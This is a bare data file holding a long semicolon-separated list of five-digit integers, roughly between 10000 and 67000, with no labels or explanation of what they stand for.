58793;63710;39963;50046;66166;35841;31822;33078;59007;53647;30653;28651;35656;49443;14956;12746;30257;54729;65944;45032;47817;22835;45558;60923;36330;12101;39557;17172;40674;41688;36647;35541;50424;59272;26877;47616;10264;27939;37951;34802;53748;44107;11442;66307;17609;64969;19917;27363;53170;25596;47629;50036;49597;63075;50252;34707;42577;24572;61895;24551;13323;44408;15001;54204;40794;25107;12372;37387;48682;19457;56290;24257;53388;45800;39345;29429;36395;41012;12123;16186;13393;39330;58773;51211;19687;65083;50320;59743;65985;24671;62497;60491;35302;43362;47169;53377;34063;65272;21979;66160;35936;31999;12010;20663;38914;53793;11449;60314;47651;45525;65159;62755;22580;58488;64665;13309;31228;32128;28049;12722;65984;10542;51377;18791;54012;28277;33969;46563;42059;31435;19536;29745;22125;16432;40185;46057;26904;45745;14744;36093;15665;17179;29933;31330;11606;25794;48206;20321;46832;31949;15818;34562;13958;18713;23051;32860;18754;64133;59039;59166;14862;20562;51003;53371;57249;44264;32853;13759;63848;10432;24809;13963;50735;49847;19672;55086;50743;13129;32864;65341;20323;15857;61189;35504;60449;13822;15011;30700;55438;58855;31260;42040;31238;12509;22296;47265;40029;30530;25654;51310;15414;48746;49153;22553;49448;64832;11711;13926;65871;26423;28979;15896;26457;40240;37139;32168;66675;59955;62084;22458;18416;31323;24767;55707;65851;65893;12265;13510;45156;35829;25831;56487;61974;44210;35718;57637;58592;63576;15248;15014;46546;49748;57813;18956;27175;31953;37303;28739;12715;48233;39766;46976;33575;35141;46048;39461;55965;44679;62121;66516;10203;44220;54243;16439;22837;14308;41225;30156;61553;61728;14502;44022;31135;34240;33852;35793;11270;38383;35975;62305;57135;24420;33416;51281;47631;20652;52525;41838;64523;27106;10345;18405;30601;16190;15236;35304;36077;19904;11020;59967;66188;13990;59811;52240;10040;63559;61596;66004;65412;18871;18034;25037;43987;43228;42277;42813;49763;20417;49797;21104;37270;51514;55296;15224;61627;46865;61460;62486;22073;62329;23288;15260;39885;31733;54489;45772;14005;54411;23881;12963;55570;38529;63794;17818;23692;32931;41986;56394;39133;39518;43529;23522;28654;53982;62005;27642;29080;27487;23096;24340;59715;51005;54279;12087;31601;66667;54345;14514;15133;16825;17148;48481;57241;11286;18755;42457;58194;55393;28564;57388;66277;61375;47550;61496;43878;64844;18181;45528;16832;54637;55123;57273;65385;43518;33396;56074;24823;42479;32532;25739;34640;58696;28690;35229;13497;12861;65565;30393;54404;29425;38299;22966;29598;35605;12829;13934;60878;13988;46241;20740;15194;57492;32363;26545;59570;37326;52306;64760;12329;25397;21234;51922;32839;66436;41158;19642;61957;58944;60843;15685;66577;34552;14856;50767;59163;55698;26548;50277;65667;47532;27816;45657;59366;17068;43596;29158;45291;44605;41091;24868;36112;12403;18150;24287;59418;47021;32178;57665;21703;62852;48441;53102;45557;34058;51706;36845;11190;65152;14780;45129;17611;41102;44726;53876;64581;62690;53269;54186;25540;60535;58746;22222;36519;56025;45148;52753;39265;62443;36182;45975;43507;19863;52706;45812;65959;42252;43548;56429;25112;48251;65855;39686;35910;27053;40785;66294;28098;39798;22700;41103;20794;42475;63370;33326;24641;55365;21442;35167;40292;11541;46997;54002;65213;51285;62555;37531;44857;20365;49640;52602;54442;61126;59444;57669;66650;61088;41842;44049;60015;18659;23660;42420;18534;40602;33145;50040;45086;18640;36584;44754;40532;65013;42398;65806;56199;22833;11894;29633;42192;56868;28713;19728;22608;14285;35911;46387;47264;62716;29715;29744;40469;40070;23623;19494;50516;11731;43304;39207;11521;40190;43927;64338;53468;59916;15210;28021;32952;17338;42670;55649;52742;54165;26867;20372;63343;44525;11494;47630;39795;33084;23057;40908;46945;48963;38134;14642;62016;22431;34559;30334;48512;62864;45304;57793;65420;41215;13206;50266;38624;44762;18095;47520;61564;40742;60065;25645;39101;19216;45626;63516;60929;57127;18378;31917;40682;37370;34218;40396;47765;13418;38304;15884;44053;49815;21540;42309;28714;22570;59915;21235;66594;31427;23768;32050;16495;39516;27989;55489;51260;58093;53665;44319;31843;14938;46652;47659;62456;34961;11610;54147;10037;14609;39790;66333;37729;57951;40910;57626;19096;49124;52397;43623;17685;60592;49559;66272;21720;60955;37961;38734;15110;50739;21637;33203;40109;19042;28893;29946;18345;56279;48960;30108;28140;36486;29012;32220;23219;50247;41108;37284;53197;34281;44413;16722;53300;28595;56213;46896;35890;35483;62587;43173;25576;46676;22629;61417;61744;48153;38034;45444;31575;15543;17062;29978;47655;36879;55109;44533;12504;48598;15126;13346;65286;44695;33608;40804;37582;13677;40223;29665;11249;47433;32525;11750;31782;23633;29215;54875;24017;37936;45294;58059;56759;14513;56366;61260;27287;42027;33257;24040;18323;36228;44392;32991;27797;28377;38393;58324;44678;16801;54905;29793;48665;58204;27972;28912;59223;31242;44470;38803;46197;66890;40449;66939;58202;62705;51770;27205;52783;21853;16976;35457;30879;12510;35798;58649;32392;51462;51139;29460;49679;35896;58716;24598;49876;15723;11008;45227;59360;58129;17086;25757;66007;49707;47662;29808;44973;12686;10704;23584;66145;24833;10313;20517;63563;21627;48932;61073;56870;55815;53350;59944;40026;17409;41739;32091;44233;46249;49152;49291;66597;37512;30138;38741;35093;25515;52823;65624;66429;62357;52383;27920;29656;46523;39430;20409;42010;19730;63237;31317;49507;48600;59487;30785;24709;58410;60409;30489;31883;31100;33882;13495;48479;39884;63253;59003;12611;15783;40279;36329;53488;66673;46176;13288;24794;17778;11651;29768;22062;47591;35618;63780;54444;25276;64600;37055;56311;11387;31770;30732;66058;52171;22453;22537;39178;57213;39927;43005;46701;40286;42239;22865;26309;39282;53583;30074;21501;28710;53855;59258;11584;17270;16023;34882;21949;29900;29048;23233;64536;15775;60187;46887;59583;45912;48838;44909;44424;40146;12074;63932;11626;51604;31980;40373;16436;60020;59332;56392;62983;34533;66935;60756;54778;15744;60389;26767;43944;19972;18331;12998;66196;50877;58633;44722;31933;42549;50672;57231;33376;30940;45051;18180;57316;21593;51434;57029;27216;17109;51721;21974;22309;47722;39729;48642;22032;59671;33395;15765;45492;56988;34861;55010;11071;50281;57404;57420;17097;52432;24788;34751;64260;45384;44899;64420;47897;51095;35858;61311;44102;58472;24022;33509;41885;38817;51879;17589;14777;50934;60152;53851;13474;50989;42727;35408;60724;39816;43761;47697;11237;17652;56318;11447;24121;65831;20561;42368;33870;34863;54550;32141;56607;32950;48519;57603;57829;33118;50220;61872;26184;53770;20207;28541;41046;20791;36069;57502;61987;49641;38531;58489;28626;35737;32646;29462;38957;21314;14455;34133;42998;40574;34636;55018;45977;17524;23534;14774;45965;10159;60733;65124;31496;17360;14445;45646;31812;66737;36690;40077;44285;60293;49235;15544;18022;25108;22785;48357;10183;10139;24006;26123;30020;65304;35122;28757;33708;48906;61657;63205;42856;15962;27233;30214;12984;21181;62280;65100;37849;59902;32406;61365;62574;58431;61142;63264;56505;47703;19989;44656;16830;60659;22649;44464;63581;36861;40454;36241;57899;54634;63702;43868;50787;57690;42979;35563;23975;37524;53717;34259;36224;56863;17498;21371;20730;63604;22964;41074;35062;61383;34337;65639;54113;51045;12433;58322;43815;21303;28635;19731;53578;64390;65081;53239;27759;48257;42268;65347;48500;57188;17642;13152;39489;10312;62469;41039;41207;63379;45694;61976;31233;21939;42612;18609;27337;15806;63047;26516;33372;60361;46312;59435;45112;20919;54913;42585;17213;34695;13730;41324;26639;39506;45306;13687;38070;61507;54708;66247;12732;51274;15183;28055;55597;24452;53626;29527;37642;60407;47025;28335;55246;66087;36703;63374;66016;46581;52117;27703;28160;42608;30079;21138;34997;39727;52519;44236;57329;42750;34992;57875;19571;10389;16790;11805;33482;35474;19114;40411;19822;39753;55792;44363;50156;32067;59267;63328;66056;11428;48790;61891;51938;36194;24256;21189;22595;17793;17028;48470;65961;53359;15972;42683;33433;30709;35713;14046;39726;22220;16589;22464;64640;33646;63686;33324;27938;23843;45683;55308;20464;14318;37382;17740;25484;63798;43033;13055;58888;48444;24413;60251;17253;66139;38426;62726;18306;30182;38947;32224;63677;39392;63260;14957;29887;43332;53827;50806;34818;49229;58762;58906;37164;59092;65479;64516;40618;60917;48865;64175;63247;32288;38746;64326;48831;64247;58976;15629;13212;55129;66823;19771;65381;26058;16818;22772;64505;19349;28444;36356;39208;34338;17346;18610;56743;20852;63984;58995;27164;18091;46436;37009;39010;49911;10556;32547;10388;63125;33603;29530;21962;65234;55312;53938;31787;10003;30798;10465;23018;54554;51507;66462;12790;16839;14014;47006;13408;34099;31851;37638;24477;15675;27996;12622;26227;55785;29300;39603;42681;50154;44873;55397;64870;37745;43027;42419;26723;52767;54043;53792;13738;35786;29114;49765;15465;41310;32274;19939;40926;18688;12481;29731;62810;12125;42126;16918;53703;20034;53554;14731;31494;39331;20799;23366;43588;18778;24217;45892;14542;41846;19425;12017;32360;49137;13083;65319;60221;59315;49319;48898;29201;55778;37987;23904;52592;65307;30289;35818;17438;18188;42116;63380;56699;47905;31403;52553;34008;62093;30537;38546;45092;56792;44591;17116;23181;31717;22019;10161;22996;54997;26530;30575;40823;37940;50663;34110;27753;11933;58896;52194;17092;17458;65902;13084;55228;50337;52689;19313;36724;33713;33222;46223;36762;53384;26416;24490;35637;27658;39907;35724;24587;32418;26028;27982;26757;60382;64605;36171;56185;14732;34117;25605;17084;38610;38219;29227;38703;17143;57297;27133;64106;63742;43443;57982;26895;43792;24003;51677;66191;59056;32745;52390;47783;32075;58166;25006;62929;63277;20490;28482;49583;21881;48931;11211;65186;19920;61569;39812;53372;62091;19718;26063;25091;53542;34632;50217;55203;46845;49879;55232;64407;47672;50597;61379;59110;17330;47639;24527;26383;51863;55754;28325;32292;10778;46160;60112;29253;15289;13735;39434;52009;36839;24778;39522;42645;41970;26760;21367;10930;48589;41965;64860;42380;20846;13081;57476;25320;16093;17264;41037;21408;56707;46476;55481;26476;45921;42931;49384;10474;52093;42796;65508;58022;26890;58732;26414;19351;39204;40440;49661;41870;34934;60992;24749;54847;54821;51453;14669;17355;32967;30103;18797;47376;15981;10978;62714;35332;41355;32945;56175;50921;33549;37149;47862;11252;64507;28048;47712;16999;12711;27132;35024;39048;23436;56610;66911;66579;21359;44099;60280;22061;64599;42426;11979;66870;29372;39120;29042;30731;10058;39592;16935;62081;22638;18455;23463;42115;56186;65368;63131;31951;56714;38556;25434;45715;32218;34675;39234;43984;64123;22695;30172;46227;52372;32460;39024;47733;62954;41629;33595;30405;58292;61368;31026;50317;54231;27020;55360;29580;20683;60233;61283;30878;51978;22535;62809;29020;46940;25199;51516;51267;59746;45820;51034;66897;28426;19786;34980;47191;18531;11166;17653;33880;48524;58187;41973;11955;59510;16887;48593;33304;26505;57334;30442;66340;53128;37392;60541;26430;54654;34005;53951;46765;27714;36925;62461;48787;32726;42187;37929;53027;50849;34989;61814;34625;43109;49164;41488;18909;50742;43374;55959;57964;58912;31237;29422;60852;47895;25415;44864;12063;46611;38430;13925;52409;48861;15137;40493;54439;23317;34411;21404;49810;66423;12985;56706;55480;24618;18700;38438;59304;45221;31213;47864;38602;41782;31283;10610;50228;56660;17136;61813;23659;65362;19671;34770;38448;62878;37905;30821;31988;62940;46336;46572;34609;55264;55288;23705;29273;37427;57014;50409;54689;22738;46479;11009;32619;37087;34255;58348;51373;38998;24207;62703;12093;41857;66619;56581;32404;14164;49040;65548;19750;60019;11913;19207;28738;42033;50103;56554;11625;30420;52114;57850;38394;12870;35788;36271;19982;19531;42246;15661;43852;34856;26351;45734;47013;47221;44935;45679;56933;55006;32582;41459;35542;59965;44939;15849;24237;13765;32603;22188;28166;39526;64249;59378;32106;40110;61107;65895;49035;48781;18294;13595;64807;45799;22358;19729;39935;23915;55002;21071;53628;50909;50185;27131;31731;48493;43078;52784;16161;40018;59222;34042;22622;65375;21542;57619;29637;23306;28621;46444;61961;14328;59293;14817;14138;32306;10192;38812;49316;28314;62953;23755;66653;54393;60018;63533;21284;12730;21075;65977;66951;45520;29950;62385;66918;50951;35458;16714;34013;44307;35851;19143;29208;11888;39997;53227;20969;56636;34464;41689;39801;17126;53553;10169;57306;34311;35477;30933;35444;11202;44298;65663;53277;63323;24934;38187;60888;21497;43916;60060;30985;17691;12035;39500;39944;19528;56138;13697;19742;30371;59651;20702;11969;26852;37780;61044;41156;33830;41670;47142;43204;63619;63878;22298;64498;41992;66300;60081;48420;48863;57235;44862;47203;66866;28585;45559;44331;61352;64300;19333;17333;13592;56473;38981;48651;42709;27323;51337;52052;24086;27090;63432;53271;18707;43563;15673;27424;27009;49614;45652;46244;17545;12841;27628;45222;25946;49207;34500;16927;11776;12670;45918;58045;24813;21959;11077;63832;55790;38447;20691;23867;32729;15700;62122;54242;21297;21159;66023;50169;47732;54752;46058;35274;25696;21233;47687;60313;34155;41467;33146;19564;37963;12671;33149;32268;16876;13432;26871;13971;12679;32325;26155;62646;27343;57894;32533;21107;65201;59853;13717;41140;53674;18911;65001;49133;57512;58790;20096;57187;45459;28168;63203;29974;66035;14914;50762;57585;37912;18722;13944;47147;20376;33139;22792;15253;26137;20172;46757;16928;13063;29925;45081;61856;17715;36912;54620;34052;20865;28417;60189;52629;11259;41170;63591;65982;28101;21928;62932;60545;65090;46074;55615;28104;43532;22257;27385;63518;62163;35691;46426;18106;48697;13948;64392;25352;19229;22678;43359;29003;29876;39634;35288;18183;66439;18932;25079;41458;28305;24170;28653;49487;64149;61357;40186;29961;33569;66552;60486;54292;29207;38133;61642;23519;21142;14619;47317;34495;34701;62691;65459;18569;12624;19644;17216;21912;37369;24615;41869;56385;29614;46296;37379;40293;10367;36078;42519;27862;15058;29815;38374;16649;33921;53163;53639;21206;35878;16383;23901;65758;16766;52552;11948;42395;12327;27415;58328;57379;15545;53524;45863;35835;65625;27281;48900;30681;57876;18276;65462;65684;44162;55381;15204;65099;24354;27826;57111;38917;16369;50018;59141;28075;28580;30746;44024;41399;53579;36487;65668;31370;45968;34615;42037;12326;14475;48286;27796;25393;48189;17785;52411;35119;40600;10822;15038;25664;28175;56455;62414;16523;65472;56726;26000;37968;65765;36811;28316;12059;17182;20621;46189;25123;16392;23372;32722;37122;44794;34661;29986;13078;26025;64111;45310;33297;11705;37878;60295;13365;48534;43591;31774;62315;21972;34080;12574;44867;45419;23153;47741;25022;35464;16018;17444;12348;66568;12701;26902;61469;12532;51856;28082;50641;23502;54285;20263;20743;53914;38912;51046;58255;36032;56082;53983;29365;29356;24683;58851;41562;21100;23866;34007;43193;43207;31639;66506;23627;65618;28521;42762;26884;59178;17065;35263;65749;36212;65430;33720;38674;29739;17681;23474;52512;18825;18388;53587;38744;11372;27419;40657;62542;22082;14172;66833;44802;62323;43370;45852;32971;24118;39298;31713;33892;54363;32194;33028;55021;34528;10277;40909;21448;20990;33533;55040;17484;11158;13289;15363;55282;64110;31344;16504;33860;33731;24780;25687;60070;34350;35256;53755;24548;11224;54026;61851;23508;58393;63741;23554;65919;18241;63368;56156;57543;41018;37206;45417;55450;56761;27944;41659;30415;42662;37359;66412;61605;64531;16739;51344;55888;45423;58506;52513;37728;24160;43512;33485;52002;43618;62446;19906;14402;27051;40848;22567;42306;43789;22442;39809;30414;52893;16028;18656;38504;44685;12076;49157;30662;49701;50389;63573;26473;14779;57123;62481;31170;15092;51660;30364;13985;23550;57264;33076;56479;16139;42759;48348;48501;36117;31968;23488;31727;61821;19757;23077;10566;55059;40978;47133;61674;36880;30196;49991;14306;34209;14451;40418;21861;18649;61704;40262;40341;13181;17565;58434;54136;47431;51033;43316;54023;34497;50444;10635;41106;19439;15263;18892;11296;53835;41210;27988;46502;24965;17765;20764;30669;59561;18595;45724;44463;35922;63051;26122;55562;36596;61218;38324;22491;14029;55913;23674;47841;12960;32163;62360;61122;15870;57675;63745;44666;37433;39003;51257;37885;55235;50120;42838;34182;35135;65327;61436;46492;16656;16930;34900;28936;65184;59279;47648;43060;12378;46678;34681;14429;44292;26898;56181;50705;60459;32863;40611;59729;22578;50272;38555;37708;29268;65605;19288;14677;27201;55497;29662;44686;43447;51070;47404;16359;34430;39263;41456;52128;13123;46571;29979;62253;66322;36455;26783;66321;20066;43341;25755;14667;24263;30583;65410;59814;35238;22953;28853;25604;11662;60681;52800;41097;53294;57304;52109;54040;31371;23339;48528;64939;41824;41364;41780;19481;34647;38631;11611;49648;18928;10483;34435;31318;58291;25004;35645;11052;19560;26348;33657;38264;55258;30793;22406;66586;35690;52259;42826;40920;26140;19329;27263;56104;19021;44300;38651;48548;35137;26069;50398;55628;60808;27433;11993;49168;24765;19250;66246;12005;27461;56285;66729;36451;53182;51550;10486;28996;27193;63692;43200;39680;61011;47554;55918;61742;32805;60723;28594;30014;38528;59001;66363;34026;47229;48922;49897;49677;24472;13236;63078;31450;14335;60797;16759;35907;52248;14333;27143;56705;14548;41241;62209;14827;16006;16956;22218;46717;11841;54262;12560;31654;57692;31987;42781;50537;11111;50890;62942;50632;40755;54460;45660;51153;26534;27234;64209;43220;11058;37443;12626;13061;12418;15041;11657;21311;41453;16224;25140;62157;41155;20142;55637;20475;61271;46253;22237;25363;61246;58823;34195;45871;51372;52479;66334;46013;47053;47507;14430;11406;45376;45699;46883;18059;24540;32933;30374;57641;44807;41290;27030;54753;27138;14919;15549;57083;14920;32826;29947;20938;18317;56382;13690;42775;21391;20021;20972;51862;36683;63701;21334;60030;49245;54283;18434;59859;65120;23028;24624;34426;31944;65082;27266;56923;45382;54244;50847;57550;12642;55666;12703;50875;56126;39544;35399;28266;64440;42330;23776;43629;23445;23658;11307;31592;53644;28852;32734;29349;35870;29239;31821;31670;23229;39731;65111;28845;57268;19147;33176;65725;37112;29069;62884;36771;55352;36243;10120;45713;61343;35049;46785;32068;52377;56762;43123;34213;28429;45450;40589;22895;45966;60181;26356;56162;52089;35734;31164;60067;59761;39314;61778;39821;41698;64219;45402;26320;21941;16545;28939;58051;66234;58605;53164;35827;62234;26846;54819;18804;27468;53861;46579;29540;14000;51322;17324;64834;61411;52887;21607;45685;35989;21981;35182;23582;54600;33418;48857;56587;28820;20030;49002;40074;49406;64278;41607;59974;39337;22978;10069;14376;15029;14679;52348;19270;65830;66025;61822;12296;50332;26814;51635;60845;43773;21429;64895;51609;42362;14436;20258;55829;20240;20430;35964;38609;43378;15945;48679;57695;33108;27379;32449;37056;30481;64079;28258;36317;45721;56331;37473;33579;33346;42493;10438;46972;33986;42056;32368;50328;36794;48394;63354;14442;54324;49418;60749;64475;36041;56693;48557;27827;66629;16357;14758;35180;28895;54112;44860;60338;48982;21321;16475;18850;56430;25413;11119;28128;15638;38298;23446;46551;26513;10086;28887;28984;26412;16752;44534;56940;35596;39281;64025;48146;25552;34511;17101;40672;40526;55967;19524;31740;64022;39297;43580;20668;55256;17242;16110;32816;42448;15753;17096;24509;47837;16652;54824;45036;41720;41334;27596;23979;17617;23688;39843;24262;42012;41743;22248;38578;17056;64409;56085;52888;20842;66287;36070;18827;25427;62620;23651;15738;47749;38269;61510;46134;43456;31747;35225;52290;21781;39356;16226;57789;25724;29964;44624;32580;59218;37110;47564;16892;30201;49057;10404;59745;41704;66752;18299;16232;41911;38209;13681;20373;28257;63977;54977;53306;38494;52338;52234;22973;37991;35599;12883;31936;48530;29482;21436;49884;56695;48562;37680;33744;14952;66123;27707;62873;47876;44564;21479;53172;18771;60645;54950;32479;31565;16842;46127;15391;43150;64015;33775;28508;26116;49705;32829;13561;42525;35350;39764;20747;26685;40876;30039;66085;63070;46847;14790;15987;32758;13866;45282;64173;58069;61040;64568;22712;44418;60285;41395;17440;23041;19525;56406;19484;15381;38445;35875;60334;49146;45718;46690;50970;26453;63461;14382;21844;43551;23918;59433;48620;49051;37742;27390;57958;52650;15115;11116;30578;23897;37348;60202;39599;36296;33724;50656;55466;28816;22557;29594;65477;57701;54349;37772;23134;49998;32876;62585;56237;19240;52663;63913;27610;34828;23781;14829;34633;11905;14599;41595;46722;63746;52936;43549;11209;16733;45722;25888;57824;32519;28091;12357;56525;28385;59530;62717;14693;25603;28217;53972;20527;24266;66206;24840;54171;33508;36113;64439;16531;54181;24854;28243;54273;26769;13195;41569;58381;57940;34525;11778;24994;46724;13269;65054;19030;49514;11397;23411;53024;48643;60426;36947;17009;58808;57085;42315;36391;27196;34256;55163;56220;55651;33617;26310;47145;31214;26810;58519;50095;25816;38807;57128;53075;18879;43157;36630;35689;47089;61332;48834;39344;59368;53423;54653;22194;20848;43045;54006;60487;12595;37924;16418;10495;40330;29418;28563;50889;18151;24182;59890;51573;47576;16635;34079;13317;11350;28223;66049;31327;51367;29571;30715;10189;57346;25402;64583;31850;18012;18492;26550;41159;27232;47437;47863;60227;45447;18705;56558;19004;34982;26113;49588;14489;60337;46534;52550;27438;53430;53471;53725;27785;65299;26886;34732;66332;18085;40019;61062;37080;54795;21708;14572;58834;45218;29821;45118;58755;27653;40328;23042;25234;61865;22323;65154;53071;45048;28598;32542;42026;59288;20282;44269;16008;34606;56941;18239;60906;44734;41354;38365;55532;53387;18499;21018;27777;60539;20347;19928;40957;30232;47241;31537;10059;15906;66899;43135;26390;46372;53448;47510;50081;23999;62922;55657;61115;59453;64141;18514;40028;31553;15470;60586;53735;19545;30836;46708;13780;33291;57206;25185;35723;66587;29729;16137;16120;62883;58309;49980;41668;28999;31475;10088;29467;58921;46471;38157;43899;43867;12065;44256;27995;46288;48649;18429;27321;53600;53773;27594;51176;26870;42372;60145;56766;49400;52892;11569;13419;64999;12100;20654;10210;32405;24644;27293;17158;18479;62239;18438;55643;50861;20129;46126;63262;14970;33865;22699;17684;25171;45080;30040;22254;39776;58017;64231;41236;28908;18162;49261;10937;15250;62102;31702;16937;28808;61161;15364;17181;49289;42787;54868;44647;40164;15511;34234;12794;57003;58027;28927;48290;17739;24393;60891;29037;65763;36888;60536;27799;30689;27230;15269;63404;35526;46804;60883;38520;16401;47362;63426;19557;39676;66806;24150;12795;54526;21536;49149;11644;56539;64198;28018;15227;43961;19592;43093;58493;64613;15163;31798;65266;59806;54543;57623;61849;17004;26523;65523;63344;60242;64194;25143;37214;48202;27906;43484;59906;31106;18427;66702;58829;19997;46957;24565;20695;14018;65271;47360;48821;27284;55201;33752;47002;53008;40033;36170;50533;23218;45241;36017;58491;51895;40207;50134;42701;34829;43411;38557;17051;64672;43071;49977;28618;41929;33806;46514;62630;64156;35448;12270;59622;45636;63715;20468;57337;15066;26741;32814;43754;60330;51798;35795;15002;39146;56985;22810;10259;49005;53029;14310;23570;25423;13392;29708;16579;59962;40445;16859;18680;15232;45136;22310;18814;65922;20642;47597;19461;28044;39011;22990;29307;12563;16953;51198;18406;61876;40984;13243;50167;49711;27426;29484;18390;52560;40325;13710;58428;41284;62490;43519;32096;33997;13375;51419;30986;64752;33546;23596;23461;27251;24131;46828;44839;62801;56481;23311;16105;63108;55091;41865;51824;35579;57197;11031;21559;54915;48977;47186;31056;34158;16720;25335;45178;39035;25836;14281;20456;19412;58219;24613;16078;45052;44278;36681;20226;45643;60032;46846;30168;66326;14394;34575;32201;41430;21936;40791;10959;12528;26381;53446;36244;38502;25595;35736;20979;33317;30333;28798;21987;22487;17986;43344;26477;23792;52173;42897;47705;49747;23304;28589;50366;60052;46050;35850;60638;58736;13745;49524;26159;44690;21643;40277;59308;54083;36206;14805;58087;41123;35107;66614;24011;66816;62707;55283;31458;13834;60839;10965;52370;13515;59160;42266;63112;16855;61287;55744;28293;32312;21084;27374;15387;47144;60816;28181;38010;26752;27875;41602;53036;40148;59340;37733;48376;59216;37886;43498;39863;63088;48736;55998;66686;43357;59979;27262;63360;13085;19029;30154;52861;38139;42070;14617;54277;40378;66285;58960;24098;23234;27072;60092;24822;10015;20484;14118;44841;52535;49338;63213;38418;11173;12552;61154;47043;38280;62963;29767;27199;24153;28360;30438;33113;60642;46969;39383;53739;66630;20878;32467;64308;27079;28201;11970;26257;15764;36102;42462;30239;11918;27411;35087;45617;22047;49732;17466;62435;23430;66195;21058;45107;60461;65298;23458;26252;54700;44403;18242;37135;48344;20886;20198;50912;22603;20076;11516;66292;52330;17388;39802;12227;28619;39581;17756;65198;30381;30737;42756;19199;29756;32373;27441;31363;46696;32389;22181;41963;30308;51333;22116;20368;36071;17193;47397;44383;27545;56043;17665;46276;18459;28322;41161;56178;17105;21108;30396;58222;28479;47880;50420;44638;22604;65169;12684;52141;49751;32741;34180;31596;19011;47700;27330;61257;56434;66077;18214;46256;38179;51441;14519;53250;24111;21577;30656;34556;32616;12969;49052;48949;59144;39406;46328;12904;32395;15678;39095;39478;13248;25805;22804;57742;23224;32982;55755;31183;35532;20259;22350;32610;60369;25683;18215;26567;56552;44661;42005;54989;30797;13196;36830;21583;46699;47345;47182;38768;55036;20793;33516;36818;59633;38312;52154;59663;38023;32386;49442;45003;17256;39405;33233;14407;64414;24368;11585;40108;56045;18266;15284;63416;38442;10370;26568;26763;28760;19139;18234;16804;14031;51051;66148;30288;29223;15864;62644;21887;20245;27575;54215;49826;14988;51540;59464;45404;49434;56194;55096;43576;23646;63826;31223;57116;60049;12086;10467;47449;34958;65600;49616;19201;28439;50116;21626;63579;18560;34890;17488;51686;25569;13535;36053;34476;53903;50859;17983;45738;29248;16740;27358;30869;11664;37461;48655;23891;19186;54330;42341;20557;23246;40624;43062;21576;46203;58046;58580;23344;21003;20075;34437;24247;46344;32906;55378;26751;28250;57855;53768;62974;55037;34940;24839;25508;11338;62935;19454;54796;51152;55112;38273;27746;24699;17108;28611;32285;66395;43325;21754;36368;52581;17718;34073;59384;59269;57234;46165;27120;13947;51159;33784;55964;37057;17072;28822;55084;53242;52819;28366;26235;38395;21757;65914;62507;52152;49955;36898;54339;59917;40932;62794;45938;63298;16234;23951;40568;23088;13413;44755;60329;62508;57486;62138;53063;43982;54508;58686;35278;51586;33822;41184;66076;11575;39104;17114;61146;44952;18136;56218;32351;10141;53571;17777;17261;41272;65550;56929;16899;17577;19547;18133;14215;57097;60714;13043;36208;36246;45270;52201;43091;34204;34708;26253;24747;22959;40762;20105;30125;51509;61567;20840;35031;24575;11495;49318;11150;56502;59400;45500;38902;41278;20959;27170;63822;60563;63670;48703;37130;15807;45427;55409;19475;33741;10184;29196;41502;45819;12943;58398;20499;50144;35774;63930;11033;45220;41710;41365;43345;25366;50963;23595;21863;25534;49956;36890;38801;42498;17119;32842;49553;19690;22190;11537;35436;32641;32133;65210;47813;40604;10655;18481;60967;64306;50294;23704;17575;32993;18289;52528;19192;33364;39799;64144;44901;20190;11548;50662;12760;41092;27974;49891;38550;12489;38940;59798;10350;24851;37652;21305;42053;24567;13267;57772;30792;59268;22898;10304;21402;26244;65965;54168;17221;26332;47660;53211;45826;37170;31858;35356;33024;53065;41632;29014;32081;58310;17496;60275;23520;27704;29205;24617;62553;34543;51026;58890;11534;49123;38258;56248;60163;41593;53200;49569;30633;49475;25060;10525;56010;65386;28004;27959;23469;35728;27436;51035;34381;21821;18573;52362;52883;29198;16274;25223;55598;18765;49276;22049;64451;18906;56751;50056;26419;19859;60654;11901;37008;56666;41968;44792;47330;28642;48893;65610;45879;23558;65690;54802;55242;23104;57534;66878;59155;54364;35839;24836;56543;13532;16492;10527;22399;45393;61140;14151;30604;51574;14009;35837;15161;64996;46231;12301;40705;25292;13511;28173;63877;66057;29146;50937;33120;37241;41708;43746;19799;42365;13064;26824;29606;18207;21048;24906;31931;49273;58681;12875;65748;25383;41599;58644;31888;26809;29599;30004;59526;60751;15576;45075;15582;50354;16090;49300;31218;47105;54518;12782;28167;34057;38063;41858;10381;66149;27567;20563;60715;54834;62944;61068;52246;39041;46641;64180;33075;39033;36018;47243;61086;44362;41271;24124;14484;43985;64090;20953;62432;59674;45608;56243;32891;27168;42718;45085;56308;42323;44508;43400;38571;49314;60440;32130;16633;35072;29985;13366;59212;32959;63910;31659;47746;64097;51286;25479;63541;38370;48299;27613;27403;61697;10999;57425;34781;53463;13817;34722;57024;34954;13741;35270;49652;46614;23341;49574;10603;15362;34027;16807;33706;27865;47852;16602;19841;64154;56030;34134;28720;66947;10629;54200;55071;27921;11171;27007;57431;34983;61829;38114;20232;57240;50588;20008;17363;31173;27544;31305;29639;47381;39779;10442;16797;40470;61445;15729;33237;35389;31304;25537;36404;46961;30920;47382;45047;39948;64704;34127;64789;42626;15769;13544;29211;13041;28846;53354;62926;27314;60677;41500;56036;66772;17128;41985;57654;28535;64540;19209;24495;66732;11570;26213;57615;62257;24689;62191;27840;18793;47166;19602;27450;30676;42533;25548;34490;45588;24535;22401;24029;64656;47307;55696;46947;52196;65796;14796;51254;60921;11930;44174;30721;16107;31505;49177;59020;25882;20853;46421;54535;59900;41457;42071;65538;58734;45661;39445;54625;48578;11219;47012;24438;26510;62218;64947;43802;37140;56844;16396;45628;59259;63655;25151;41378;43915;19978;61554;36929;43974;36450;26753;54341;26160;40991;44153;65584;48256;56356;36306;52699;22770;21930;13918;56507;58119;14700;49210;44002;27034;20629;57184;29225;31570;44853;63728;57139;23316;20053;37641;64700;50803;17106;25420;31107;31151;64029;65552;50747;10144;27597;25339;49639;16233;42665;36524;59048;52880;52622;35366;25708;51103;32222;44207;60559;60492;58975;31335;38113;35187;43589;42598;41976;29232;31873;34694;39047;51233;19931;11250;42918;38724;10090;57868;23579;11106;22871;28744;24898;32043;55180;57378;47553;21435;44306;42465;21112;22591;43203;64957;23462;48356;20488;33486;23572;24718;14286;56943;33656;53556;29560;23350;12664;40305;46908;64253;44156;58256;22197;37646;39617;34459;63868;39342;54540;40578;41342;64641;63335;14071;47688;37089;64151;42324;38241;37701;55014;17232;14331;11435;49972;41998;27691;33754;27059;45328;36977;55924;29448;24648;22775;66281;46723;33916;38439;43581;48319;18114;46770;65613;31620;62550;19769;10830;38105;20613;66178;16386;52850;55769;49499;24552;21444;38675;41639;23027;50278;29274;21298;50792;42981;57788;54764;58103;21079;15143;43612;29410;60348;52192;53334;23071;15122;60744;60005;24405;17389;29332;65782;23925;60237;45482;15187;26018;60823;43846;49321;12575;